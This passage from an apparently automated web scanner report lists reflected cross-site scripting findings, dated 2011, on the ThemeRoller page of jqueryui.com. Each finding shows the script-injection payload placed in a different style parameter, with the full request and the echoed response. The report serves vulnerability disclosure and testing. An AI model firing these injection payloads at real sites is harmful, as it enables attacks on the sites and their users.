GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=6549013"><script>alert(1)</script>e719f071a57&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:15 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=6549013"><script>alert(1)</script>e719f071a57&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColo
...[SNIP]...

3.23. http://jqueryui.com/themeroller/ [bgImgOpacityContent parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityContent request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f2b8e"><script>alert(1)</script>4893dfa1069 was submitted in the bgImgOpacityContent parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75f2b8e"><script>alert(1)</script>4893dfa1069&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:26 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75f2b8e"><script>alert(1)</script>4893dfa1069&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefaul
...[SNIP]...

3.24. http://jqueryui.com/themeroller/ [bgImgOpacityDefault parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityDefault request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3f27d"><script>alert(1)</script>ef2045cfdcc was submitted in the bgImgOpacityDefault parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=753f27d"><script>alert(1)</script>ef2045cfdcc&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:42 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=753f27d"><script>alert(1)</script>ef2045cfdcc&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgC
...[SNIP]...

3.25. http://jqueryui.com/themeroller/ [bgImgOpacityError parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityError request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 10d83"><script>alert(1)</script>440d9262b96 was submitted in the bgImgOpacityError parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=9510d83"><script>alert(1)</script>440d9262b96&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:43 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=9510d83"><script>alert(1)</script>440d9262b96&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png
...[SNIP]...

3.26. http://jqueryui.com/themeroller/ [bgImgOpacityHeader parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHeader request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e5bb4"><script>alert(1)</script>9e07f5d558 was submitted in the bgImgOpacityHeader parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75e5bb4"><script>alert(1)</script>9e07f5d558&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120039

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
/parseTheme.css.php?ctl=themeroller&ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75e5bb4"><script>alert(1)</script>9e07f5d558&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=22
...[SNIP]...

3.27. http://jqueryui.com/themeroller/ [bgImgOpacityHighlight parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHighlight request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6ffee"><script>alert(1)</script>0861f63f7bc was submitted in the bgImgOpacityHighlight parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=556ffee"><script>alert(1)</script>0861f63f7bc&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=556ffee"><script>alert(1)</script>0861f63f7bc&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a
...[SNIP]...

3.28. http://jqueryui.com/themeroller/ [bgImgOpacityHover parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityHover request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 59604"><script>alert(1)</script>34ad975ff8c was submitted in the bgImgOpacityHover parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=7559604"><script>alert(1)</script>34ad975ff8c&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:17:58 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www3
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
fault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=7559604"><script>alert(1)</script>34ad975ff8c&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgC
...[SNIP]...

3.29. http://jqueryui.com/themeroller/ [bgImgOpacityOverlay parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityOverlay request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cf027"><script>alert(1)</script>1e9050619f4 was submitted in the bgImgOpacityOverlay parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0cf027"><script>alert(1)</script>1e9050619f4&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:18:57 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
gColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0cf027"><script>alert(1)</script>1e9050619f4&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="te
...[SNIP]...

3.30. http://jqueryui.com/themeroller/ [bgImgOpacityShadow parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgImgOpacityShadow request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 994f3"><script>alert(1)</script>03809dbf2df was submitted in the bgImgOpacityShadow parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHighlight=2e83ff&bgColorError=fef1ec&bgTextureError=02_glass.png&bgImgOpacityError=95&borderColorError=cd0a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0994f3"><script>alert(1)</script>03809dbf2df&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px HTTP/1.1
Host: jqueryui.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.62
Date: Mon, 18 Jul 2011 02:19:07 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.2.4-2ubuntu5.10
X-Served-By: www4
X-Proxy: 1
Content-Length: 120042

<!DOCTYPE html>
<html>
<head>
   <meta charset="UTF-8" />
   <title>jQuery UI - ThemeRoller</title>
   
   <meta name="keywords" content="jquery,user interface,ui,widgets,interaction,javascript" />
   <meta nam
...[SNIP]...
a0a&fcError=cd0a0a&iconColorError=cd0a0a&bgColorOverlay=aaaaaa&bgTextureOverlay=01_flat.png&bgImgOpacityOverlay=0&opacityOverlay=30&bgColorShadow=aaaaaa&bgTextureShadow=01_flat.png&bgImgOpacityShadow=0994f3"><script>alert(1)</script>03809dbf2df&opacityShadow=30&thicknessShadow=8px&offsetTopShadow=-8px&offsetLeftShadow=-8px&cornerRadiusShadow=8px" type="text/css" media="all" />
...[SNIP]...

3.31. http://jqueryui.com/themeroller/ [bgTextureActive parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://jqueryui.com
Path:   /themeroller/

Issue detail

The value of the bgTextureActive request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 882e1"><script>alert(1)</script>07149fc06f1 was submitted in the bgTextureActive parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /themeroller/?ffDefault=Verdana,Arial,sans-serif&fwDefault=normal&fsDefault=1.1em&cornerRadius=4px&bgColorHeader=cccccc&bgTextureHeader=03_highlight_soft.png&bgImgOpacityHeader=75&borderColorHeader=aaaaaa&fcHeader=222222&iconColorHeader=222222&bgColorContent=ffffff&bgTextureContent=01_flat.png&bgImgOpacityContent=75&borderColorContent=aaaaaa&fcContent=222222&iconColorContent=222222&bgColorDefault=e6e6e6&bgTextureDefault=02_glass.png&bgImgOpacityDefault=75&borderColorDefault=d3d3d3&fcDefault=555555&iconColorDefault=888888&bgColorHover=dadada&bgTextureHover=02_glass.png&bgImgOpacityHover=75&borderColorHover=999999&fcHover=212121&iconColorHover=454545&bgColorActive=ffffff&bgTextureActive=02_glass.png882e1"><script>alert(1)</script>07149fc06f1&bgImgOpacityActive=65&borderColorActive=aaaaaa&fcActive=212121&iconColorActive=454545&bgColorHighlight=fbf9ee&bgTextureHighlight=02_glass.png&bgImgOpacityHighlight=55&borderColorHighlight=fcefa1&fcHighlight=363636&iconColorHigh